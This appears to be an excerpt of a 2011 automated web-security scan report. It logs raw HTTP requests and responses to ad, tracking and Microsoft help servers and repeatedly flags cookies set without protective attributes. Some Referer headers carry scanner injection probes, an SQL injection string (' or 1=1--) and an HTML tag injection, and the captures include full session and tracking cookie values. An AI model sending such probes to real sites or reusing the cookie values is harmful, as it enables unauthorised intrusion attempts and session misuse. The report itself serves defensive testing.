HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 23:50:18 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: CO1MPPMYREN04 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345018&rver=5.5.4177.0&wp=mbi&wreply=http:%2f%2fmy.msn.com%2f&lc=1033&id=254014 Set-Cookie: MC1=V=3&GUID=992d4dfe4a3a437b8a4c171fc7cceb14; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ Cache-Control: no-cache Cache-Control: no-store, must-revalidate, max-age=0 Content-Type: text/html; charset=utf-8 Content-Length: 287
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345018&rver=5.5.4177.0&wp=mbi&wrep ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05? HTTP/1.1 Host: oasc03049.popsci.com Proxy-Connection: keep-alive Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS98684d1eb89eae890ac2d30814f7062d=v2tc6q1pdr66s599a60pjsel52
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 17:16:01 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: OAX=rcHW801FnNEABrjk; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.popsci.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 13662 Content-Type: application/x-javascript Set-Cookie: NSC_d14efm_qppm_iuuq=ffffffff09499e5845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41?observations&&&referrer=http://burp/show/60 HTTP/1.1 Host: oascentral.scientificamerican.com Proxy-Connection: keep-alive Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 17:14:45 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: OAX=rcHW801FnIUACoU2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.scientificamerican.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 7042 Content-Type: application/x-javascript Set-Cookie: NSC_d14efm_qppm_iuuq=ffffffff09499e5945525d5f4f58455e445a4a423660;path=/
function OAS_RICH(position) { if (position == 'Right1') { document.write ('<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2005419&PluID=0&w=300&h=250&ncu=$$http://oasc ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/bing/ff808490.aspx HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAABHBwAAm7TtVgJMvgFAgnqZu/TJhg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:50:25 GMT Content-Length: 34741
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/msn/money.aspx HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAADfBgAA2AXSEcBOJjoMRri+WPCcHQ!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:24 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:24 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:17:23 GMT Content-Length: 26482
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/msn/qwlinfo.aspx HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAADHCAAA266j5xBE5bvLgdGilVUO5Q!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:28 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:28 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:17:27 GMT Content-Length: 28036
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/msn/qwlnotyours.aspx HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAAAVBwAAg+A0N79NlMCN1BebkgAdCA!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:27 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:27 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:17:26 GMT Content-Length: 24860
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/msn/thebasics.aspx HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAAAKBwAA5krr+oNHqj3Y35ynMPVKcA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:50:26 GMT Content-Length: 21044
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /A06546/b3/0/3/1003161/543149170.js HTTP/1.1 Host: pix04.revsci.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: udm_0=MLv3NSMJaSpn3g1FgecyID/YTWjxcmn+jRwDtK6yKGSqLiDCbz2rscDhNkPJfBSzlL4dxsqrgwGwTcU0yVOl93x0bsnVOXBsYOd//QgpPolrbS4+Nw8pZmwuLu/BFF7QsvnGgRit9IQdrMe68QJG+xARlbfeqCut/4QAwRNJQR/XlVBysq/jrFHdWb+7tcucPJDdqOzrQiKJQMWveoQqCvYVuCItXlfGZkoyggle3az/HvQUB76nGMvM6aK+iHbgmmWUZ7vTesbzpgDUtcCDBy1OP8b/EWRyH4uNf3IiIEN7uN/unTN7wj+d3aJN+S/uAmGvQTMbx92ct+tNW/fLsANU3MGbWx9PWZB8OCJZ1Jjg7/r6sb6HKhDbfUhULrzcm41SNIyqo/UPwJQztEuuuiLIririPZSp5K8cha5iUvwBePNVNuTjmqDgmws5XPyigl5UM6qcPfeQiBpeVKzEw1/Vq2msHxmzpfSHKTD8e90Ps1HEYrkFOPic6v6njtkrtHLHDXb971WO7HB/0bEjCaOTtCC9kXesDSj90s8MzA++V01FrJ3dgnIeesBl0xJxLJRIU5VhoyLHXgkVIX37uD6r7oH0cMDf2K7Eaupks0wRDpggvT5EFH8JlWlBVNXM79nOtYm2WHhGrjCqhrat51GMQL5cfCHYT3mZFcmfFrSHZGkbkOFSTPWvaB2MEzzvZmVxJjOFYAeGcJdekdsk/yPfbRlXWhTqBzXFxnBdkAVVgrh2H6Jj/iMj22RD7lrrnu0tLor5OZ8cn6Ym51edHhgpShQyzLU9V8EG0n7wfEQLBINnz6LPBtX6+8SS5RQrtiF/eGzW8dYK23z34XahxqULrJN5RQMIu5VTy7/Ghw6qjoZ/sD5mTNDI+RcSBdg0d0+9f7uCZnkisLc6SVCJ5iUT5F9LuU/+AfJo2l8alr6bDLTj2kS4UGIT3Ac5OdkWIBI/wfXDydN6T1e3I63W6L/h9vQpbrgZAA/KjPp2Yq4gjVuQsW3u4AbuNaZJ51egQSvC1zJn+6C/ibzxCxGnJ3bIiVn23LgeutuBiHfVN+6fwIGIhfLz3WmndFELqStWoNJq+LCRtr5BMYrCX5JQu49xYlIiFztxwRQPG4DDLowZx9qjXQOR8xq6IWWic6t7idKbOc4DlCW/3azG8wjO4MNyD2fCSb0csZSqhgdPg8/egWktt/TP2cZ4dhF+JU3+tmQ7e5p2; rsi_segs_1000000=pUPFeUOFbwIUllNab/cemd1+k3oMcz9wc4mVCGdkHCrwWmaePNeODkXbq2K+tQyP8LR5ylRhRNgirDTpoIcrk+cIkXXfbtlOSmsfU1UZkujEsLbnRvi1mdYlE9GqFbJhJJ6Bxw2/6Vp1FAEA8dbQxknNO77OBB0EhWDzhf+pHpllJGeHUdUpo++k4d+c5bY1Qvx4d5W47BVKBDhTd7AdL12fLl6zFZaTu+rTxdLhlftv2v2MUDe2Y91CvpzYDUg3O3napeeKccCImESkDVzox9S9Nh2WBZtMXhJbvQq6; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; rtc_0=MLsvsSNONj5rJ5GcjT68k50qPXPDyERqefZOna8MpC1/MWJCA4xH8SpWANL7YB35qSS2yy33RhKjqBIMAOt8NoSzFqWLk9C/EJW8fOfXalWBSLot+iDRScbnkWzcs1/5J9Rx2c+G+oM0+jiIjwnzOTsWVXIT3GJP2zqS8f5YK8LGidZZncaP6FyDewZOD9OqSXj0NADF7466hKYsChUFHUNSff/3W9Ex/u0KFSUhMg3pTqYAo5WxWU01Utx+qoxPJcgytEBIWsioEX18AfchTIZJmLQAEZ/GX1LD0ubdgUVJbjy56rZyaUyBYLpIwqtbgx/90WrLhotV4hGILddtKL521RDHO3KguvCmAbp7tNQv1TNIkXJQw69MkhHauf14LG4Jl+6S91aCeKmyWq/ifshFreMNqI1pwfaCUIgSDqQR71PQ5uSSjfqXxM5HAKaUJwTu5OY=; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d69b449&0&&4d43b3c1&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Sun, 27-Feb-2011 02:17:45 GMT; Path=/ X-Proc-ms: 11 P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA" Server: RSI Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/javascript;charset=UTF-8 Content-Length: 733 Date: Sun, 30 Jan 2011 02:17:45 GMT Connection: close
/* Vermont-12.4.0-1012 */ rsinetsegs=['A06546_10827','H05525_10833','A06546_50376']; var rsiExp=new Date((new Date()).getTime()+2419200000); var rsiDom=location.hostname; rsiDom=rsiDom.replace(/.*(\.[ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EHAAG6ANq0itiBDbz6HJXbIAAboBAfYFgfQAmtGkrxPyD5ELwXzlIG3R8gDChB0bohjR4QCJENoVz2kQ4QANEOECjRk_44OSDUKoTRMW4QsYEfopG3wRwQsRCFGx4QA9EAAiABcoSCVfgoGyODsR4Zoh
Response
HTTP/1.1 200 OK Connection: close Set-Cookie: d=EBAAG6ANq0itiBDbz6HJXbIAAboBAfcFgZUAmtGkrxPyD5ELwXzlIG3R8gDChB0bohjR4QCJENoVz2kQ4QANEOECjRk_44OSDUKoTRMW4QsYEfopG3wRwQsRCFGx4QA9EAAiABcoSCVfgoGyODsR4Zoh; expires=Sat, 30-Apr-2011 01:29:45 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Content-Type: image/gif Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 35 Date: Sun, 30 Jan 2011 01:29:45 GMT Server: QS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ewr?cid=20015042&versionid=3 HTTP/1.1 Host: ptsd.eyewonder.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: ew=MDAwMTI5NjMzNTIzMjE4MTAwMDAyMDM3NzFfMTI5NjM1MDQ2MjU2MV8xMV9fXzA; Domain=.eyewonder.com; Expires=Sun, 27-Mar-2011 01:21:02 GMT; Path=/ Set-Cookie: ewroi=""; Domain=.eyewonder.com; Expires=Sun, 27-Mar-2011 01:21:02 GMT; Path=/ P3P: CP="NON DSP COR NID CURa PSAa PSDa OUR STP UNI COM NAV STA LOC OTC", policyref="http://pts.eyewonder.com/static/ew/w3c/p3p_eyewonder.xml" gmtdiid: 8a8486852dd2373f012dd2d1a0311046 Content-Type: text/javascript;charset=US-ASCII Content-Length: 325 Date: Sun, 30 Jan 2011 01:21:02 GMT Connection: close
/* Created On: 1296350462561 */var ew20015042_dynamicAdModel={acid: 0,adid: 200927,eid: 20015042,tid: 0,emv: 4,uid: null,value: ''};document.writeln('<scr'+'ipt language="Javascript" id="ew20015042_wr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 HTTP/1.1 Host: r1-ads.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;
Response
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Location: http://c Cache-Control: private, max-age=0, no-cache Expires: Sun, 30 Jan 2011 18:08:28 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Date: Sun, 30 Jan 2011 18:08:28 GMT Connection: close Set-Cookie: C2=ckaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/ Set-Cookie: F1=BwRqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/ Set-Cookie: BASE=YnQIw8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGZzKkH34A2YJp0mlrsdsoHFQpedEnsa1jeNn6DX4gEe8q7+PfCnaoMfuk12NE/thpzCn5VOb439eAtA8H94fPT2rXaUFI5B8ZpnMfoxItOvXLGaW4J4F0dmWeier4pMWAS2vxuWBCRUhUAUMdxmDZkV0elS56NOPbQGc4/x8C3O1qy6+lsqVS0JVS4aPSuzn3Ehr11AyP/sYZxiJMJ62cPqgtVaKoBR0tBKArR5M6ZEkksVxhNYu5MwpJ5jE+KhQNwbqIaCZcBvRiSaOOCc9v4hyiZTg86THBE/lb4ruixI+EufQQeHrI0KcamCQSOCxGBBEycusl82vNHuKFXJuLVCAU35iawlCzwpTzbs5w3W/ZCdgMBRs9GM44HthzXXU1dDY4OPC59B0jBKtwOuWupJMebppDp4Oazc+50+y94tvsDw3jRRrBy/Mm/RtrVR0xC+ByQvRH!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/ Set-Cookie: ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/ Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click Set-Cookie: 6566708061=_4d44bf07,6566708061,730461^950192^1183^0,1_; domain=advertising.com; path=/click
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://c">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
